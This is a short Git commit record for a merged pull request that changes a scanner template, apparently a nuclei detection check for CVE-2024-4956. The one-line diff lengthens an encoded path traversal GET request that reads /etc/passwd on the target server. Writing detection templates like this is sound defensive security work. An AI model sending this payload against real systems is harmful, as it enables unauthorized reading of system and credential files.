Merge pull request #9929 from moyue83/cve-2024-4956

enlarged traversal path for CVE-2024-4956, this is often not long enough
patch-3
Ritik Chaddha 2024-05-29 20:33:20 +05:30 committed by GitHub
commit 16a91c4efa
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 1 additions and 1 deletions

View File

@ -30,7 +30,7 @@ info:
http:
- method: GET
path:
- "{{BaseURL}}/%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
- "{{BaseURL}}/%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
matchers:
- type: dsl